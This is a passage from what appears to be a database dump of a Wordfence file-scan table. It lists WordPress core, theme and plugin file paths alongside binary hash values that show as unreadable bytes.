I�}��','',0,'?'),('�ݡ=��Nx��K�`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W9y\\g�e�%�9�','n\Z�?�>%��U&��L^hp!j-l��]Z*#M','',0,'?'),('�sc�Ev��O8�','wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^�_��_]E�M\'so','�����-L���n�@A��!��@����f��','',0,'?'),('�O>�Pw�^�Y��X�','wp-includes/blocks/post-template/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n���V��&�G��T�B','����գJ?�Lja��]^ޓ� �R�V�%e.','',0,'?'),('�뷎wh\\Xs����l','wp-content/plugins/wordpress-seo/admin/pages/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�91\0<�&t�D/l��V','�[����h��3�;4A]�DA/����','',0,'?'),('��d��=��@hs�:k}','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#lJP��e0u�g�۔�','U�WM����slL����9#Tb�Wj?\\�u���','',0,'?'),('�rJ�<p>����Z�','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2Q���l�~���!','��t�RS)�z�\\{ӑ(�Wd��9c�K�F�','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�e؞w\\��4\"R','mM�](E��=����tR��,`\".��}�U','',0,'?'),('�?H�����h�D0 ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('ǭ���kOl 9ڇ�J','wp-content/themes/twentytwentyone/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^+O���m4d�^','���A�V\0;T�}`x�~t;�\"9�$�','',0,'?'),('z\0��3h���d�*','wp-includes/blocks/post-template/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�{�� CJ�D�1F','Zk�&�\0���#����-B���=����n','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�C�QX}\nŮQ�@M�','3�;�i�,��zö#�5C5\n��4,��X�a ','',0,'?'),('8h�->�<N��DZ','wp-content/plugins/wordpress-seo/languages/yoast-components-hu_HU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zT�C��ޡ\'��1\0Հ','7>=�ꀿ6;��mO�3�������Z���','',0,'?'),('9�zh��!�9Pmk�','wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$�E\Z��\0�C��','�,=;a_����\"㳭`,w�0P�s@<�+�~:','',0,'?'),(':��Nf��n9rxH:̯','wp-content/plugins/wordpress-seo/src/conditionals/the-events-calendar-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\r֓ y9����','��t3\Z�����\'���F#\0���|��|�:','',0,'?'),('=�[:���\r&�F��E','wp-includes/blocks/video/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w��g�K��? �D��','X��c���� �ﬢkvSn�7�W�5̋a\'�','',0,'?'),('>B�\"�6ǷT*Wض','wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-vip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�*d�^d ��T�\Z','�`����\r�,����-)�����}3�{','',0,'?'),('?���϶�^7:y��','wp-includes/blocks/paragraph/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���:�t�Me&�>','�ʟ�ω���P�Xw��P�\0�ޤop���l�Ҷ','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h��R��m�y�L:','D�k�L�?@Ά��\"����2�j62A�','',0,'?'),('Wd�l��\09?��i���','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VZ[ÝL��~��U��Y',',���,����)��Z�\'�f�R0��Т�%\n0','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N9CԮ�w=A^Ց��','ʞ<}�� �i�S�zN�f+s����','',0,'?'),('q�(e�|>jY��sC','wp-content/plugins/wordpress-seo/css/dist/icons-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�>N�:�� #�','��f�\r��h�nH\Z<��|-�BY/\0�m','',0,'?'),('��E�_*:6`I�t���','wp-content/plugins/wordpress-seo/inc/date-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T��]�i�k��4�%{','M�:��C��Ԗ,0��0����\\�|3���','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('�Uơ�i�>J�93','wp-content/languages/en_GB-f8f49d9fc4a9cf7d78ec99285417bd9c.json',0,'\0S5`�����H�B)�','\0S5`�����H�B)�','�ß�!�XJ����*Wi��q�q>�&$��','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y������Ę �','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('�wk��b,:7�07G','wp-content/plugins/wordpress-seo/js/dist/edit-page-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*���?�C-��L��.','�}\nﻅ.c��T�L�.��ip�Z�w�m�n��','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�[��jB4L!��','0�Ri�J���,P�X�y � *Ri����!','',0,'?'),('��}�qU��1\r/ʭ:','wp-content/uploads/2019/09/garden-350x220.jpg',0,'s#̒��� \Z��9�','s#̒��� \Z��9�','9��{i@���5~g�aVZ�u��\n!��4K','',0,'?'),('�ڤ& �M�KQ�o?','wp-admin/images/freedom-2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:Dw����8���','H���_�Y:\"8������0o�_6\\&�ZYY','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�����<�^G��\"0c!','C�O�W%���tߏ�Y�|��&�0�V�\\�','',0,'?'),('���;��i�0��J~�','wp-includes/blocks/columns/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')���,�b�P�L(|','���ce]�s�����S��a�\\�Y�u:��','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M�HwX�f3��Ҟ','�ķT�,#R-D�v#���8t�[\Z��?�v_��','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('���d�ƍg V��GD','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�,�5��$����','�t��.&]\'�RNKE��2,��LCD����','',0,'?'),('�z�y,��e\"��!��','wp-content/plugins/wordfence/css/wordfenceBox.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('���}��>�|��I','wp-content/themes/twentynineteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����?����/��L��','v��b3샪k\n!{;�]��\\�;~=J�8����','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���za��}O)�pa�','��YRU!�<�sx=i�ſ\Z� �XCI���vY','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��߈pA��Nm��STR','��`i�>��^<��7}\Z���!��`!ts��','',0,'?'),('j���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/-6���r9��/�ZF','#�>��w{��H�C���c/X�җ��.','',0,'?'),('r�K���y�B���z','wp-content/plugins/wordpress-seo/src/exceptions/semrush/tokens/failed-storage-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�����Z��H�','|h+FX?R�}&�M|B�\0�Lm�L<(���*�','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hȗk{#�u��$cPo3','�����\'�j��L(��j���Q�L]6l����','',0,'?'),('��>�`P���@��߹','wp-includes/theme-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�`�q�p�\\\'h','��f8����\'u��+�W+l����~KԸ$.','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ���E��W����','�t��P�?Cutx`w`�MO��yQ��.J�G��','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5bcjc�Tc�sq�̣]','W:.@�H9�K�B5\\�a�t 얗�ʪg�/','',0,'?'),('�s���9�\"�?','wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�6h|.�1G%\\Z�6c�','�6~���ꏔ{��5��Za�g��L(���','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('�*��k�um1=-���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IW B���>ToR��J','8ȼ�?$[�g1N4}��{�Y�K�J�$��C90','',0,'?'),('�r�W�3���V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),('����3���\n�g','wp-content/plugins/wordpress-seo/images/newsletter-collage.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VO�+�O�Ri=�>��','�l�\"a�q��� r����]�) ��\r�ԅ','',0,'?'),('^E��d��PM9dz','wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qo��ʛ�u�����\0','�qx�\"���/����nu�.K�GNbJ=m�]','',0,'?'),('9+��$yl�R�2��','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-terms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�\\��?\0컅�','1\"\n����Ę�;렦�V�0�|\nH��\Z&$)�','',0,'?'),(':�X��2�M��~��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�4vLhN�!��2|','���3iA(���p���GD��ڔ����','',0,'?'),('Br��,�z�XG#Nj>','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RequestOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|��xE��k��(�','Z~��\Z\'���ҍSF���k�����V�B=','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('D]���8��h�I}�,','wp-content/uploads/2016/11/roofs-960x150.jpg',0,'�����M�psz��ڡj�','�����M�psz��ڡj�','��\0��eĘpU�H\0�63!���<��W�N�','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('V� �F�<Tp�*���','wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-prepare-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U7D��M�','7���*q�!0�}%�:�?<S��}t�}�kHq7','',0,'?'),('Y�U��h|kU$��;','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��DZc�ժ�h�Ǘ�','x\n�� �sd��26*�P�ꫡ�f�t��45�bz','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���\n2���0���\0','aG�ִ\nOk�&1���`3�*��ҿf���_W�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('tRg_x\Z�K�j\nm�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!X�ԟ��b3m��g�I','�B�4�h��o�/�i�y��rw\0r\\k�� ��׳','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�V-[���+�r\0��','�lzS}�@�)�����o����V[���c�','',0,'?'),('�6��d7��Cπ','wp-content/plugins/wordpress-seo/src/integrations/front-end/theme-titles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R��^T�S������\r','�B[��ʧQ�Ѫ��ѽ�`�DW���r!����','',0,'?'),('�����c?��]8T�','wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΗJ�=3~�@��%�8','50�wN�m5�(.�B�0cH�Rd�Mr��Y��!','',0,'?'),('��c�O�@�/�lM�','wp-includes/blocks/separator/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nS���Cg%�\nn��','��ች�^wx%8�a���!\'�b�m:�n#\r��','',0,'?'),('�)�:�F�:!�','wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t71���ۅBL�f��','#�}/��u$�z:��z�����l�4�0Ր','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','®���uM�����','�JE�z����ٙ6������)P��)��\0��','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('����t/)�{��','wp-content/languages/en_GB-5251f7623766a714c8207c7edb938628.json',0,'qw����d*iIY�p','qw����d*iIY�p','�� ���*�h��G�T[�ޯ��Y�Ɲ/�^�','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^SӠ���ҩ���','�Nn�\n\\p�w����L|���҉\0�-�\\��;','',0,'?'),('�d�� �D&�>�SPX','wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�!�W�0ȏ���l��','����\Z_�NƘ��RDq�ndhp\"A�ӣ��\nt.}','',0,'?'),('���[s&i�u)�n','wp-includes/blocks/video/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','人�ejqpu�Kq','�3��6�=����[��E3�����M��,�-','',0,'?'),('�&� Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*��� [����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��2|�;\0{������','wp-content/uploads/2019/08/renting2-300x169.jpg',0,'��{�JЕ���^�','��{�JЕ���^�','y/C����=#�g�DdY^��m�l�R�w��\n','',0,'?'),('�7Ȥ3۳#h�T�','wp-content/plugins/wordpress-seo/js/dist/externals/schemaBlocks-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E�9�_�[�.0','��L����=`<�^a�7����S|\'�','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('4�J�-<O�iDf�.�','wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B>�@�Q�O�M�ߴ','E�2M�Q!t\n\"��j�\'��8���zZ��Y�F','',0,'?'),('8\Z��[�V��+���','wp-content/uploads/2016/11/roof-plate-300x198.jpg',0,'&U�(L��H���Fō','&U�(L��H���Fō','���QL��@�>�b�-:���\\z��vD�l�~','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:',' ��\'��A-��êu��rdƹ��Q����','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�\'r�X~dط{','5�Ֆ�HʬP��Q��r��b�.���e;�s0K�','',0,'?'),(']zJ�S3�\'�k�>','wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C(`��|Uv��w���','a�\'\Z��<zd����3�(�C�;x@`T��^��','',0,'?'),('^V�RD<;�� ��3T','wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��]�s�?\0�cy���(','b�w�r7��Ňg{ZW����\Zا9���','',0,'?'),('c�� ȵ�E9jz[�','wp-includes/blocks/code/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����̕{C��c��','����5�$�%\n/����t��\'W&�����','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('w�7�v+�q1�\Z���','wp-includes/blocks/list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:{���LF7�B{\rt','��y��υH���PM��7�����1��F�m!','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2� ��\0Df��','',0,'?'),('���!�aJ��xT@}R','wp-content/languages/en_GB-ac23eee47530ac63a1178c827db28087.json',0,'�.�폒H�0�HA�\0','�.�폒H�0�HA�\0',';ڤ��I%���6�[R]hsh?����*��u�.$�','',0,'?'),('��KS+�eA�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn T��5^�','��Y�y�7B۩���/�c��$r��&���Z','',0,'?'),('�����Fe� 57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h �5�w','',0,'?'),('�D*;v(�.Ҳ�N','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j6�«���)�r]��','q>��[^uw\nq68��?R.�U]&�E?�ϥ;�','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('���MK\n���%���','wp-content/plugins/wordpress-seo/languages/yoast-components-tr_TR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�|Vi_6��@ J','�.�����)��tP�níX˙���a;L��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('��v�i� w�Dz�','wp-content/plugins/redirection/locale/redirection-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5$�걆V�ސ�9�A','�\\#0a�\n\0�U�����S4 Q-�ߐM�C|','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),('\0�ً 2�%&�3/','wp-content/uploads/2019/09/garden-300x250.jpg',0,'��r�.�(~��j$�8��','��r�.�(~��j$�8��','_1�5��\'7����3F-*��\n�ZTB��T�w�','',0,'?'),('�t�YSQ/[��R�C','wp-includes/blocks/gallery/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y_<n�dc��F���','�8y�4���>\"�3bem3B٣ �È��L} ','',0,'?'),('���l|���ugʲ','wp-content/plugins/wordpress-seo/css/dist/notifications-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ES*��]�\\���e','7����{B�.�w�հ�\Z��%�}�U�٠��','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+��\'|�','�C�Z���hau�ݣ�K�Cif!�����\'~F�p','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),(';�\0v�z��Xz<C�AI','wp-content/plugins/redirection/database/schema/231.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�],N�:��p��3�','���iP�x�]v��Ӱy6����zП3d8n��/','',0,'?'),('>Ç*�{��*��\nD','wp-content/themes/vega/assets/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϯx���h�=���J','*�ݙh��}�i:��uG�L�Uk�>�=��j','',0,'?'),('H���~{ppN)�聻','wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�_��}3o','����t>M�ѓf����7���h�J����','',0,'?'),('V�X�w`�\ZA�\Z','wp-content/languages/en_GB-2c5d274ea625dd91556554ad82901529.json',0,'��N�J��[��>�x','��N�J��[��>�x','?�i£�C�q��lֵ�Ӗ��~+I!ۦ�\Zo','',0,'?'),('[\r%M�{/tRe��','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r2���M��A�V','8��7a[[ek-����_Vǿ��Z�/��\'','',0,'?'),('\\���\Z�e �)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('�t��d!b��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\